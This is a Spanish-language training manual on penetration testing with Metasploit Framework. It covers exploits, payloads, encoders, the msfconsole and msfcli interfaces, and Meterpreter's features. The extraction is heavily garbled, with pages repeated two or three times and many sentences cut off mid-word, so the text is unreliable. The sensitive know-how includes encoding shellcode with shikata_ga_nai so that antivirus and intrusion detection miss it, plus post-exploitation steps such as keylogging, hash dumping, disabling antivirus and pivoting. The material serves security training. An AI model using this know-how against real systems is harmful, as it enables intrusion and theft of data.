42
Certified Offensive and Defensive S Certified Off Profes (Profesional Certi Penetratio F Security Professional -CODSP Training © www.dsteamseguridad.com fensive and Defensive Se ssional -CODSP Training ificado en Seguridad Ofensiva y D Taller de entrenamiento: on Testing con Metas Framework v 1.0 ecurity g Defensiva) sploit

Cpods training-metasploit

Embed Size (px)

DESCRIPTION

EJERCICIOS PRACTICOS DE METASPLOIT

Citation preview

Page 1: Cpods training-metasploit

Certified Offensive and Defensive Security

Certified Offensive and Defensive Security

Professional

(Profesional Certificado en Seguridad Ofensiva y Defensiva)

Penetration Testing con Metasploit

Framework

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

Certified Offensive and Defensive Security

Professional -CODSP Training

(Profesional Certificado en Seguridad Ofensiva y Defensiva)

Taller de entrenamiento:

Penetration Testing con Metasploit

Framework v 1.0

Certified Offensive and Defensive Security

Training

(Profesional Certificado en Seguridad Ofensiva y Defensiva)

Penetration Testing con Metasploit

Page 2: Cpods training-metasploit

Certified Offensive and Defensive Security

Fundamentos y conceptos básicos de Explotación y el software

Seguramente muchas personas han escuchado hablar a un amigo, colega, un conferencista, un docente, entre otros, sobre los Frameworks de explotación de vulnerabilidades, y en especial del famoso Framework de explotación llamado Metasploit, y muy seguramente ha entrado algún nivel de curiosidad en lo que respecta al funcionamiento, alcance e impacto que tiene este entorno de trabajo en la seguridad de la información ofensiva. En efecto proyectos como Metasploauditorías, Test de Penetración y/o pruebas de seguridad a los sistemas de información, ya que su potencia es tal, que personal técnico en el área de las tecnologías de la información sin experiencia en seguridad de la información y/o usuarios mal intencionados pueden hacer uso de Metasploit para realizar pruebas de seguridad de una forma sencilla y causar según el usuario, un buen dolor de cabeza a los administradores de sistemas o por el contrario, presentar importantes alertas de seguridad de forma anticipada, para corregir los agujeros y debilidades de seguridad de un sistema informático. Sin embargo software como Metasploit tiene más positivo que negativo, ya que tener un entorno de trabajo con exply listos para ejecutarse, obligan a las empresas desarrolladoras de software a programar y publicar los parches para los agujeros de seguridad que son aprovechados por los diferentes marcos de explotación que existen en el mercado. Como e La potencia de Metasploit radica en tremultiplataforma y la comunidad. Facilidad de uso: desde el usuario inexperto y novato en las pruebas de seguridad a sistemas de información, hasta el usuario experto que tiene las capacidades de crear códigos de explotación, puede hacer uso de todo el potencial de Metasploit como parte esencial de las herramientas que usan para la realización de las pruebas de seguridad a los sistemas informáticos. Multiplataforma: Otra razón de peso para aprovechar todo el potencial de Metasploit, es que puede ser usado en diferentes sistemas operativos como Linux, Windows, Unix, entre otros, sin perder en ningún momento la potencia del software Metasploit, indepoperativo que usa el usuario final. La comunidad: Metasploit fue liderado por un experto Hacker llamado HD Moore en el año 2003, sin embargo con el pasar de los años, muchos expertos en desarrollo de códigos de explotación se han sumado a este gran proyecto, con lo que miles de programadores del mundo en la actualidad programan códigos de explotación de vulnerabilidades y los integran a Metasploit, ayudando así a que la base de datos de exploit en Metasploit, sea de las más completas en el mundo, y se mantenga bien actualizada. Para comenzar de forma adecuada el estudio, análisis y práctica con el software de explotación Metasploit, es importante conocer la estructura de Metasploit y algunos conceptos baserelacionados con la explotación de vulnerabilidades.

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

ásicos de Explotación y el software Metasploit.

Seguramente muchas personas han escuchado hablar a un amigo, colega, un conferencista, un docente, entre otros, sobre los Frameworks de explotación de vulnerabilidades, y en especial

explotación llamado Metasploit, y muy seguramente ha entrado en lo que respecta al funcionamiento, alcance e impacto que tiene

este entorno de trabajo en la seguridad de la información ofensiva.

En efecto proyectos como Metasploit han revolucionado la forma en que se realizan las auditorías, Test de Penetración y/o pruebas de seguridad a los sistemas de información, ya que su potencia es tal, que personal técnico en el área de las tecnologías de la información sin

seguridad de la información y/o usuarios mal intencionados pueden hacer uso de Metasploit para realizar pruebas de seguridad de una forma sencilla y causar según el usuario, un buen dolor de cabeza a los administradores de sistemas o por el contrario,

esentar importantes alertas de seguridad de forma anticipada, para corregir los agujeros y debilidades de seguridad de un sistema informático. Sin embargo software como Metasploit tiene más positivo que negativo, ya que tener un entorno de trabajo con exply listos para ejecutarse, obligan a las empresas desarrolladoras de software a programar y publicar los parches para los agujeros de seguridad que son aprovechados por los diferentes marcos de explotación que existen en el mercado. Como es el caso de Metasploit.

La potencia de Metasploit radica en tres conceptos fundamentales: Facilidad de uso, multiplataforma y la comunidad.

desde el usuario inexperto y novato en las pruebas de seguridad a sistemas a el usuario experto que tiene las capacidades de crear códigos de

explotación, puede hacer uso de todo el potencial de Metasploit como parte esencial de las herramientas que usan para la realización de las pruebas de seguridad a los sistemas

: Otra razón de peso para aprovechar todo el potencial de Metasploit, es que puede ser usado en diferentes sistemas operativos como Linux, Windows, Unix, entre otros, sin perder en ningún momento la potencia del software Metasploit, independiente del sistema operativo que usa el usuario final.

Metasploit fue liderado por un experto Hacker llamado HD Moore en el año 2003, sin embargo con el pasar de los años, muchos expertos en desarrollo de códigos de

do a este gran proyecto, con lo que miles de programadores del mundo en la actualidad programan códigos de explotación de vulnerabilidades y los integran a Metasploit, ayudando así a que la base de datos de exploit en Metasploit, sea de las más

n el mundo, y se mantenga bien actualizada.

Para comenzar de forma adecuada el estudio, análisis y práctica con el software de explotación Metasploit, es importante conocer la estructura de Metasploit y algunos conceptos base

ón de vulnerabilidades.

Seguramente muchas personas han escuchado hablar a un amigo, colega, un conferencista, un docente, entre otros, sobre los Frameworks de explotación de vulnerabilidades, y en especial

explotación llamado Metasploit, y muy seguramente ha entrado en lo que respecta al funcionamiento, alcance e impacto que tiene

it han revolucionado la forma en que se realizan las auditorías, Test de Penetración y/o pruebas de seguridad a los sistemas de información, ya que su potencia es tal, que personal técnico en el área de las tecnologías de la información sin

seguridad de la información y/o usuarios mal intencionados pueden hacer uso de Metasploit para realizar pruebas de seguridad de una forma sencilla y causar según el usuario, un buen dolor de cabeza a los administradores de sistemas o por el contrario,

esentar importantes alertas de seguridad de forma anticipada, para corregir los agujeros y debilidades de seguridad de un sistema informático. Sin embargo software como Metasploit tiene más positivo que negativo, ya que tener un entorno de trabajo con exploits actualizados y listos para ejecutarse, obligan a las empresas desarrolladoras de software a programar y publicar los parches para los agujeros de seguridad que son aprovechados por los diferentes

s el caso de Metasploit.

conceptos fundamentales: Facilidad de uso,

desde el usuario inexperto y novato en las pruebas de seguridad a sistemas a el usuario experto que tiene las capacidades de crear códigos de

explotación, puede hacer uso de todo el potencial de Metasploit como parte esencial de las herramientas que usan para la realización de las pruebas de seguridad a los sistemas

: Otra razón de peso para aprovechar todo el potencial de Metasploit, es que puede ser usado en diferentes sistemas operativos como Linux, Windows, Unix, entre otros,

endiente del sistema

Metasploit fue liderado por un experto Hacker llamado HD Moore en el año 2003, sin embargo con el pasar de los años, muchos expertos en desarrollo de códigos de

do a este gran proyecto, con lo que miles de programadores del mundo en la actualidad programan códigos de explotación de vulnerabilidades y los integran a Metasploit, ayudando así a que la base de datos de exploit en Metasploit, sea de las más

Para comenzar de forma adecuada el estudio, análisis y práctica con el software de explotación Metasploit, es importante conocer la estructura de Metasploit y algunos conceptos base

Page 3: Cpods training-metasploit

Certified Offensive and Defensive Security

Metasploit: En su versión Framework, Metasploit es un software de explotación amparado como Software Libre y código abierto, inicialmente escrito en el lenguaje de programación Perl, pero actualmente estáadquirido por la potente empresa de seguridad llamada Rapid7, y recibe un gran número de solicitud de descargas de forma anual. Vulnerabilidad: Es una debilidad que existe en un sistema operativo, aplicación, dispositivde red, protocolos de red, entre otros, la cual permite a un atacante o auditor de seguridad comprometer la seguridad del sistema o dispositivo de red. Exploit: Es un código, método o vía, que permite a un atacante informático o a un auditor de seguridad explotar una vulnerabilidad conocida, para poder comprometer la seguridad de un sistema informático. A modo informático, Metasploit cuenta con más de 700 códigos de explotación. Payload: Es un código que acompaña y se ejecuta después del código de expobjetivo de poder realmente hacer algo en el sistema de la Payload se usa para realizar una conexión entre el atacante y la victima. Algunos ejemplos de un Payload, seria la conexión a la victima por mediopor ejemplo, o conectarse a la victima usando el protocolo VNC. A modo informático, Metasploit cuenta con más de 250 códigos del tipo Payload. Encoder: Es un componente de metasploit, el cual se usa para generar verde Payloads. Módulos: Los módulos son pequeños componentes del sistema, donde cada modulo realiza una tarea específica, la cual puede ser llamada en algún momento para integrarse a otros módulo, y poder hacer así una tarea varios módulos. ShellCode: El shellcode se define como un conjunto de instrucciones que son utilizadas por un Payload cuando el proceso de explotación se ejecuta. Por lo regular en Shellcode en lenguaje Ensamblador (Assembly). En la mayoría luego de que se ejecute el código Shellcode se recibe al usuario atacante y/o auditor de seguridad una Shell de comandos. Listener: Un listener es un componente del software Metasploit, el cual queda a la espera dealgún tipo de conexión entrante. Un ejemplo de un listener seria cuando una maquina victima ha sido comprometida y se ha dejado algún tipo de puerta trasera o servicio ejecutándose en la maquina víctima, y dicho servicio hace llamados de conexión a la maqforma periódica para poder lograr de nuevo una intrusión en el equipo víctima. Auxiliar (Auxiliary): Es un modulo de Metasploit Framework, el cual permite hacer tareas adicionales, para resolver problemas específicos,por fuerza bruta, entre otros. Arquitectura de Metasploit: La arquitectura modular del software Metasploit, puede verse en la siguiente gráfica.

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

En su versión Framework, Metasploit es un software de explotación amparado como Software Libre y código abierto, inicialmente escrito en el lenguaje de programación

escrito en el lenguaje de programación Ruby. A la fecha fue adquirido por la potente empresa de seguridad llamada Rapid7, y recibe un gran número de solicitud de descargas de forma anual.

Es una debilidad que existe en un sistema operativo, aplicación, dispositivde red, protocolos de red, entre otros, la cual permite a un atacante o auditor de seguridad comprometer la seguridad del sistema o dispositivo de red.

: Es un código, método o vía, que permite a un atacante informático o a un auditor de dad explotar una vulnerabilidad conocida, para poder comprometer la seguridad de un

sistema informático. A modo informático, Metasploit cuenta con más de 700 códigos de

Es un código que acompaña y se ejecuta después del código de expobjetivo de poder realmente hacer algo en el sistema de la víctima, por lo regular el código Payload se usa para realizar una conexión entre el atacante y la victima. Algunos ejemplos de un Payload, seria la conexión a la victima por medio de una Shell de comandos como cmd.exe por ejemplo, o conectarse a la victima usando el protocolo VNC. A modo informático, Metasploit cuenta con más de 250 códigos del tipo Payload.

Es un componente de metasploit, el cual se usa para generar versiones trasformadas

Módulos: Los módulos son pequeños componentes del sistema, donde cada modulo realiza , la cual puede ser llamada en algún momento para integrarse a otros

módulo, y poder hacer así una tarea más representativa de forma completa y compuesta por

El shellcode se define como un conjunto de instrucciones que son utilizadas por un Payload cuando el proceso de explotación se ejecuta. Por lo regular en Shellcode

je Ensamblador (Assembly). En la mayoría luego de que se ejecute el código Shellcode se recibe al usuario atacante y/o auditor de seguridad una Shell de comandos.

Un listener es un componente del software Metasploit, el cual queda a la espera dealgún tipo de conexión entrante. Un ejemplo de un listener seria cuando una maquina victima ha sido comprometida y se ha dejado algún tipo de puerta trasera o servicio ejecutándose en la maquina víctima, y dicho servicio hace llamados de conexión a la maqforma periódica para poder lograr de nuevo una intrusión en el equipo víctima.

Es un modulo de Metasploit Framework, el cual permite hacer tareas adicionales, para resolver problemas específicos, tales como el scanning de puertos, ataques por fuerza bruta, entre otros.

: La arquitectura modular del software Metasploit, puede verse en

En su versión Framework, Metasploit es un software de explotación amparado como Software Libre y código abierto, inicialmente escrito en el lenguaje de programación

e programación Ruby. A la fecha fue adquirido por la potente empresa de seguridad llamada Rapid7, y recibe un gran número de

Es una debilidad que existe en un sistema operativo, aplicación, dispositivos de red, protocolos de red, entre otros, la cual permite a un atacante o auditor de seguridad

: Es un código, método o vía, que permite a un atacante informático o a un auditor de dad explotar una vulnerabilidad conocida, para poder comprometer la seguridad de un

sistema informático. A modo informático, Metasploit cuenta con más de 700 códigos de

Es un código que acompaña y se ejecuta después del código de explotación, con el , por lo regular el código

Payload se usa para realizar una conexión entre el atacante y la victima. Algunos ejemplos de de una Shell de comandos como cmd.exe

por ejemplo, o conectarse a la victima usando el protocolo VNC. A modo informático,

siones trasformadas

Módulos: Los módulos son pequeños componentes del sistema, donde cada modulo realiza , la cual puede ser llamada en algún momento para integrarse a otros

tativa de forma completa y compuesta por

El shellcode se define como un conjunto de instrucciones que son utilizadas por un Payload cuando el proceso de explotación se ejecuta. Por lo regular en Shellcode está escrito

je Ensamblador (Assembly). En la mayoría luego de que se ejecute el código Shellcode se recibe al usuario atacante y/o auditor de seguridad una Shell de comandos.

Un listener es un componente del software Metasploit, el cual queda a la espera de algún tipo de conexión entrante. Un ejemplo de un listener seria cuando una maquina victima ha sido comprometida y se ha dejado algún tipo de puerta trasera o servicio ejecutándose en la maquina víctima, y dicho servicio hace llamados de conexión a la maquina atacante de forma periódica para poder lograr de nuevo una intrusión en el equipo víctima.

Es un modulo de Metasploit Framework, el cual permite hacer tareas ng de puertos, ataques

: La arquitectura modular del software Metasploit, puede verse en

Page 4: Cpods training-metasploit

Certified Offensive and Defensive Security

Fuente: http://www.offensive Analizando un poco el diagrama anterior, se tiene lo siguiente: Libraries (Librerías): Las diferentes librerías son usadas de forma clave parafuncionamiento de Metasploit, ya que estas son una agrupación de tareas definidas, operaciones y funciones que pueden ser usados por los diversos módulos que componen Metasploit. Una de las Libreríasmás importantes en el Framework de explotacies la Librería Rex, la cual es la base para la mayoría de tareas, ya que dentro de esta librería se encuentran componentes de gran importancia como las implementaciones de los protocolos a nivel de servidor y cliente. Luego se tiene la Librería "MSF Corelibrary",

implementación de todas las internases requeridas, las cuales permiten el trabajo de forma conjunta con los módulos de explotación, las sesiones, entre otros. Finalmente se encuentra la Librería trabajo con los diferentes tipos de interfaces a nivel de usuario. Interfaces: El entorno de trabajo de Metasploit, ofrece diferentes tipos de interfaces, cada una de ellas con sus fortalezas y debilidades. Las interfaces son las siguientes: Msfconsole: Es una de la partes más populares y reconocidas de Metasploit Framework, ya que es una herramienta del "tipo todo en uno", es una herramienta llena de funcionalidades, en la cual se puede hacer todo tipo de procesos en el Framework, tales como la carga de módulos auxiliares, el scanning de una red, procesos de enumeración, creación de listeners y el lanzamiento de un exploit. Es una de las interfaces que mayor apoyo y soporte tiene con el entorno de trabajo de Metasploit.

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

http://www.offensive-security.com/metasploit-unleashed/Metasploit_Architecture

Analizando un poco el diagrama anterior, se tiene lo siguiente:

Las diferentes librerías son usadas de forma clave parafuncionamiento de Metasploit, ya que estas son una agrupación de tareas definidas, operaciones y funciones que pueden ser usados por los diversos módulos que componen Metasploit. Una de las Libreríasmás importantes en el Framework de explotacies la Librería Rex, la cual es la base para la mayoría de tareas, ya que dentro de esta librería se encuentran componentes de gran importancia como las implementaciones de los protocolos a

"MSF Corelibrary", esta librería tiene como funciona principal la implementación de todas las internases requeridas, las cuales permiten el trabajo de forma conjunta con los módulos de explotación, las sesiones, entre otros.

a Librería "Base library", la cual es la encargada de soportar el trabajo con los diferentes tipos de interfaces a nivel de usuario.

El entorno de trabajo de Metasploit, ofrece diferentes tipos de interfaces, cada una zas y debilidades. Las interfaces son las siguientes:

Es una de la partes más populares y reconocidas de Metasploit Framework, ya que es una herramienta del "tipo todo en uno", es una herramienta llena de funcionalidades,

acer todo tipo de procesos en el Framework, tales como la carga de módulos auxiliares, el scanning de una red, procesos de enumeración, creación de listeners y el lanzamiento de un exploit. Es una de las interfaces que mayor apoyo y soporte tiene con el

torno de trabajo de Metasploit. Para ingresar a la interface msfconsle, simplemente basta

unleashed/Metasploit_Architecture

Las diferentes librerías son usadas de forma clave para el adecuado funcionamiento de Metasploit, ya que estas son una agrupación de tareas definidas, operaciones y funciones que pueden ser usados por los diversos módulos que componen Metasploit. Una de las Libreríasmás importantes en el Framework de explotación Metasploit es la Librería Rex, la cual es la base para la mayoría de tareas, ya que dentro de esta librería se encuentran componentes de gran importancia como las implementaciones de los protocolos a

esta librería tiene como funciona principal la implementación de todas las internases requeridas, las cuales permiten el trabajo de forma

la cual es la encargada de soportar el

El entorno de trabajo de Metasploit, ofrece diferentes tipos de interfaces, cada una

Es una de la partes más populares y reconocidas de Metasploit Framework, ya que es una herramienta del "tipo todo en uno", es una herramienta llena de funcionalidades,

acer todo tipo de procesos en el Framework, tales como la carga de módulos auxiliares, el scanning de una red, procesos de enumeración, creación de listeners y el lanzamiento de un exploit. Es una de las interfaces que mayor apoyo y soporte tiene con el

Para ingresar a la interface msfconsle, simplemente basta

Page 5: Cpods training-metasploit

Certified Offensive and Defensive Security

con abrir una shell de comandos y digitar el comando siguiente imagen.

Luego debe de abrirse la interface msfconsole, tal

Al principio la interface puede parecer un poco compleja, pero a medida que el usuario va conociendo los diferentes comandos, se podrá apreciar la facilidad de trabajo bajo la interfaces msfconsole. Para usar la ayuda dentro de la interface msfconsole, se debe de digitar el siguiente comando: msfconsole

Un listado completo de los comandos soportados por la consola msfconsole, puede ser consultado en la siguiente URL: http://www.offensive-security.com/metasploit Msfcli: Es una consola que se ejecuta directamente desde la línea de comandos (Shell). A diferencia de msfconsole, msfscli es upueden lanzar exploits, configurar módulos auxiliares, entre otros. A pesar de que su uso es limitado frente a msfconsole, msfcli es una interface de gran utilidad para ejecutar tareas tales como: probar nuevos exploits, realizar explotación

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

con abrir una shell de comandos y digitar el comando msfconsole, tal y como se aprecia en la

Luego debe de abrirse la interface msfconsole, tal y como se aprecia en la siguiente imagen.

Al principio la interface puede parecer un poco compleja, pero a medida que el usuario va conociendo los diferentes comandos, se podrá apreciar la facilidad de trabajo bajo la interfaces

a ayuda dentro de la interface msfconsole, se debe de digitar el msfconsole -h

Un listado completo de los comandos soportados por la consola msfconsole, puede ser consultado en la siguiente URL:

security.com/metasploit-unleashed/Msfconsole_Commands

Es una consola que se ejecuta directamente desde la línea de comandos (Shell). A diferencia de msfconsole, msfscli es una consola más limitada, en la cual de igual forma se pueden lanzar exploits, configurar módulos auxiliares, entre otros. A pesar de que su uso es limitado frente a msfconsole, msfcli es una interface de gran utilidad para ejecutar tareas tales

r nuevos exploits, realizar explotación específica cuando el usuario conoce el

, tal y como se aprecia en la

y como se aprecia en la siguiente imagen.

Al principio la interface puede parecer un poco compleja, pero a medida que el usuario va conociendo los diferentes comandos, se podrá apreciar la facilidad de trabajo bajo la interfaces

a ayuda dentro de la interface msfconsole, se debe de digitar el

Un listado completo de los comandos soportados por la consola msfconsole, puede ser

unleashed/Msfconsole_Commands

Es una consola que se ejecuta directamente desde la línea de comandos (Shell). A na consola más limitada, en la cual de igual forma se

pueden lanzar exploits, configurar módulos auxiliares, entre otros. A pesar de que su uso es limitado frente a msfconsole, msfcli es una interface de gran utilidad para ejecutar tareas tales

específica cuando el usuario conoce el

Page 6: Cpods training-metasploit

Certified Offensive and Defensive Security

exploit y las opciones, automatizaciónaprendizaje de Metasploit Es importante tener presente que msfcli, solo puede manejar unala vez. En la siguiente imagen se podrá ver un ejemplo de uso de msfcli.

Msfweb: Es una consola web de fácil uso, del tipo apunte y tire o "PointRelativamente ha sido considerada como una consola inestable ymodulo del di lomado en seguridad, no se hará uso de este tipo de interface. Armitage: Es una interface grafica a nivel de usuario, creada por Raphael Mudge, la cual posee muchas características y se integra con Metasploit de formadiplomado y/o taller de seguridad no se hará mucho énfasis en Armitage, pero vale la pena que el estudiante luego profundice en esta interface, teniendo presente de forma anticipada el buen manejo de la consola msfconsole, yel siguiente link se encuentra un interesante curso de puesta en marcha y pruebas con Armitage. http://www.ethicalhacker.net/content/view/379/2/En la siguiente imagen se puede observar la interface Armi

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

exploit y las opciones, automatización básica y con scripts, además es adecuado para el

Es importante tener presente que msfcli, solo puede manejar una shell o un hilo de conexión a la vez. En la siguiente imagen se podrá ver un ejemplo de uso de msfcli.

Es una consola web de fácil uso, del tipo apunte y tire o "PointRelativamente ha sido considerada como una consola inestable y de poco uso. Para este modulo del di lomado en seguridad, no se hará uso de este tipo de interface.

Es una interface grafica a nivel de usuario, creada por Raphael Mudge, la cual posee muchas características y se integra con Metasploit de forma gratuita. Para este modulo el

de seguridad no se hará mucho énfasis en Armitage, pero vale la pena que el estudiante luego profundice en esta interface, teniendo presente de forma anticipada el buen manejo de la consola msfconsole, y que esté familiarizado con Metasploit Framework. En el siguiente link se encuentra un interesante curso de puesta en marcha y pruebas con Armitage. http://www.ethicalhacker.net/content/view/379/2/ En la siguiente imagen se puede observar la interface Armitage.

básica y con scripts, además es adecuado para el

shell o un hilo de conexión a

Es una consola web de fácil uso, del tipo apunte y tire o "Point-and-click". de poco uso. Para este

Es una interface grafica a nivel de usuario, creada por Raphael Mudge, la cual posee gratuita. Para este modulo el

de seguridad no se hará mucho énfasis en Armitage, pero vale la pena que el estudiante luego profundice en esta interface, teniendo presente de forma anticipada el

que esté familiarizado con Metasploit Framework. En el siguiente link se encuentra un interesante curso de puesta en marcha y pruebas con

Page 7: Cpods training-metasploit

Certified Offensive and Defensive Security

Nota: Para los módulos de explotación y postbasarnos principalmente y en un gran porcentaje en la interface msfconsole. Metasploit Utilities (Utilidades Importantes de Metasploit):

sernos de mucha ayuda en situaciones específicas que en algún momento se nos presenten al momento que estemos realizando nuestras auditorías de sistemas, y tests de seguridad del tipo Hacking Ético. MsfPayload: Es una utilidad de Metaspimportancia tales como: Generar códigos del tipo shellcode, generar archivos ejecutables, para pruebas de infecciones de virustroyanos por ejemplo. Con los las prácticas de laboratorio vistas en el transcurso de este diplomado, veremos que la utilidad msfpayload es de gran ayuda para los procesos de explotación del lado cliente (ClientSide). MsfEncode: Los códigos del tipo “Shellfuncionales, sin embargo mucinterpretados por muchos programas, pueden causar que el código no se ejecute de forma completa. Además de que los Shellcode generados muy probablemente lleguen a la victima pasando por redes que estén siendo vigiladas y protegidas por sistemas detectores de intrusos y software antivirus. Por todas las razones expuestas anteriormente los desarrolladores de Metasploit crearon Msfencode, el cual es una utilidad que ayuda a evitar que el shelpreparada por el auditor informático y/o Pentester, sea indetectable y no contenga caracteres que afecten la ejecución del código antes de tiempo.(Codificador) para diversas situaciones. Para identificar la limsfencode, se debe de digitar el comando que se aprecia en la siguiente imagen:

Uno de los encoders más fiables que contiene Mestaploit, es el encoderx86/shikata_ga_nai, el cual está clasificado como Excelentedisponibles, digitar el siguiente comando desde la Shell de Linux Backtrack:

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

Nota: Para los módulos de explotación y post-explotación de este curso de seguridad, vamos a basarnos principalmente y en un gran porcentaje en la interface msfconsole.

(Utilidades Importantes de Metasploit): Las siguientes usernos de mucha ayuda en situaciones específicas que en algún momento se nos presenten al momento que estemos realizando nuestras auditorías de sistemas, y tests de seguridad del

Es una utilidad de Metasploit que le permite al usuario final tareas de gran importancia tales como: Generar códigos del tipo shellcode, generar archivos ejecutables, para pruebas de infecciones de virustroyanos por ejemplo. Con los las prácticas de laboratorio

curso de este diplomado, veremos que la utilidad msfpayload es de gran ayuda para los procesos de explotación del lado cliente (ClientSide).

Los códigos del tipo “Shell code” generados pro msfpayload son totalmente funcionales, sin embargo muchos de estos códigos contienen caracteres nulos, los cuales al ser interpretados por muchos programas, pueden causar que el código no se ejecute de forma

Además de que los Shellcode generados muy probablemente lleguen a la victima es que estén siendo vigiladas y protegidas por sistemas detectores de intrusos

y software antivirus. Por todas las razones expuestas anteriormente los desarrolladores de Metasploit crearon Msfencode, el cual es una utilidad que ayuda a evitar que el shel

informático y/o Pentester, sea indetectable y no contenga caracteres que afecten la ejecución del código antes de tiempo. Metasploit contiene diferentes encoders (Codificador) para diversas situaciones. Para identificar la lista de opciones de la utilidad msfencode, se debe de digitar el comando que se aprecia en la siguiente imagen:

fiables que contiene Mestaploit, es el encoderx86/shikata_ga_nai, el clasificado como Excelente (Excellent). Para ver un listado de los encoders

disponibles, digitar el siguiente comando desde la Shell de Linux Backtrack: msfencode

explotación de este curso de seguridad, vamos a

Las siguientes utilidades pueden sernos de mucha ayuda en situaciones específicas que en algún momento se nos presenten al momento que estemos realizando nuestras auditorías de sistemas, y tests de seguridad del

loit que le permite al usuario final tareas de gran importancia tales como: Generar códigos del tipo shellcode, generar archivos ejecutables, para pruebas de infecciones de virustroyanos por ejemplo. Con los las prácticas de laboratorio

curso de este diplomado, veremos que la utilidad msfpayload es de gran

code” generados pro msfpayload son totalmente hos de estos códigos contienen caracteres nulos, los cuales al ser

interpretados por muchos programas, pueden causar que el código no se ejecute de forma Además de que los Shellcode generados muy probablemente lleguen a la victima

es que estén siendo vigiladas y protegidas por sistemas detectores de intrusos y software antivirus. Por todas las razones expuestas anteriormente los desarrolladores de Metasploit crearon Msfencode, el cual es una utilidad que ayuda a evitar que el shellcode

informático y/o Pentester, sea indetectable y no contenga caracteres Metasploit contiene diferentes encoders

sta de opciones de la utilidad msfencode, se debe de digitar el comando que se aprecia en la siguiente imagen:

fiables que contiene Mestaploit, es el encoderx86/shikata_ga_nai, el Para ver un listado de los encoders

msfencode -l

Page 8: Cpods training-metasploit

Certified Offensive and Defensive Security

Clasificación de los Exploit y los Payloads en Metasploit Framework: Clasificación de los Exploit: Los códigos de explotacdos: Exploit Activos y Exploits Pasivos Exploit Activos: Son códigos de explotación que se ejecuten en la maquina victima de forma completa, incluyendo la finalización del código. Algunos ejemplos de exploits act ms08_067_netapi smb/psexec Exploit Pasivos: Son códigos de explotación que esperan a que las victimas se conecten a ellos. Por lo regular son los códigos exploits que están del lado del cliente (ClienSide). Clasificación de Payloads: Los códigtres: Singles, Stagers, y Stages.Cada uno de ellos posee una gran variedad y pueden aplicarse a diferentes escenarios. Singles: Son tipos de Payloads que son autónomos e independientes, y se ven repen acciones como crear un usuario o abrir la calculadora (calc.exe) en el sistema víctima. Stagers: Son tipos de Payloads diseñados de un modo pequeño y fiables y permiten configurar una conexión de red entre la Stages: Son tipos de Payloads un poco el sistema víctima tales como Inyección VNC, Meterpreter, entre otros. Meterpreter (Meta- Interpreter)

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

Clasificación de los Exploit y los Payloads en Metasploit Framework:

Los códigos de explotación (Exploits) en Metasploit se dividen en dos: Exploit Activos y Exploits Pasivos

Son códigos de explotación que se ejecuten en la maquina victima de forma completa, incluyendo la finalización del código. Algunos ejemplos de exploits act

Son códigos de explotación que esperan a que las victimas se conecten a ellos. Por lo regular son los códigos exploits que están del lado del cliente (ClienSide).

Los códigos del tipo Payload (Carga Útil) en Metasploit dividen en Stages.Cada uno de ellos posee una gran variedad y pueden aplicarse a

Son tipos de Payloads que son autónomos e independientes, y se ven repen acciones como crear un usuario o abrir la calculadora (calc.exe) en el sistema víctima.

Son tipos de Payloads diseñados de un modo pequeño y fiables y permiten configurar una conexión de red entre la víctima y el atacante.

Son tipos de Payloads un poco más pesados, y permiten descargar y hacer procesos en el sistema víctima tales como Inyección VNC, Meterpreter, entre otros.

Interpreter) “Todo en Uno” – El Payload Rey.

ión (Exploits) en Metasploit se dividen en

Son códigos de explotación que se ejecuten en la maquina victima de forma completa, incluyendo la finalización del código. Algunos ejemplos de exploits activos son:

Son códigos de explotación que esperan a que las victimas se conecten a ellos. Por lo regular son los códigos exploits que están del lado del cliente (ClienSide).

os del tipo Payload (Carga Útil) en Metasploit dividen en Stages.Cada uno de ellos posee una gran variedad y pueden aplicarse a

Son tipos de Payloads que son autónomos e independientes, y se ven representados en acciones como crear un usuario o abrir la calculadora (calc.exe) en el sistema víctima.

Son tipos de Payloads diseñados de un modo pequeño y fiables y permiten configurar

pesados, y permiten descargar y hacer procesos en

Page 9: Cpods training-metasploit

Certified Offensive and Defensive Security

Como se verá a lo largo de este cPayloads, pero meterpreter es uno de los que define como una extensión de Metasploit, la cual permite aprovechar al máximo las funcionalidades de Metasploit y anuestra maquina víctima. También puede definirse como un Payload avanzado. Dentro de muchas de las funcionalidades y características que nos ofrece Meterpreter se encuentran:

• Cargar Un Keylogger(Móduvictima

• La comunicación entre el atacante (Auditor) victima (objetivo de evaluación) es cifrada

• Hacer capturas de pantalla(Screenshot) en el sistema victima

• Subir y descargar archivos entre el siste

• Apagar el sistema victima

• Manipular el registro de Windows en el sistema victima (Acceso Lectura/Escritura)

• Abrir una Shell de comandos en el sistema victima

• Migrar de procesos en el sistema victima

• Obtener los Hash de los usuarios del sistema victima

• Pivoting entre subredes en el sistema y/o red victima

• Evita la creación de procesos en el sistema victima

• Evita la creación de archivos en el disco duro del sistema victima

• Es una herramienta que sirve tanto en el procesoexplotación.

• Se pueden usar múltiples canales de comunicación entre la (Auditor) usando la misma conexión.

• Acceso al sistema de archivos en el sistema victima

• Ejecución de comandos en el sistema vic

• Obtener información del sistema victima

• Es un Payload estable y altamente flexible

• Deshabilitar el software antivirus

• Capturar trafico de red en el sistema victima

• Y Mucho mas…………………… En la siguiente imagen podemos apreciar una Shell Meterpreter que atacante y/o auditor de seguridad, luego de que este ha realizado una intrusión exitosa sobre un sistema vulnerable con S.O Windows XP.

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

a lo largo de este curso de seguridad, Metasploit Framework tiene muchos Payloads, pero meterpreter es uno de los que más funcionalidades tiene. Meterpreter se define como una extensión de Metasploit, la cual permite aprovechar al máximo las funcionalidades de Metasploit y aumentar el alcance en lo que respecta a comprometer a

. También puede definirse como un Payload avanzado. Dentro de muchas de las funcionalidades y características que nos ofrece Meterpreter se

Keylogger(Módulo que graba las pulsaciones en el teclado) en el sistema

La comunicación entre el atacante (Auditor) victima (objetivo de evaluación) es cifrada

Hacer capturas de pantalla(Screenshot) en el sistema victima

Subir y descargar archivos entre el sistema víctima y el atacante y/o auditor.

Apagar el sistema victima

Manipular el registro de Windows en el sistema victima (Acceso Lectura/Escritura)

Abrir una Shell de comandos en el sistema victima

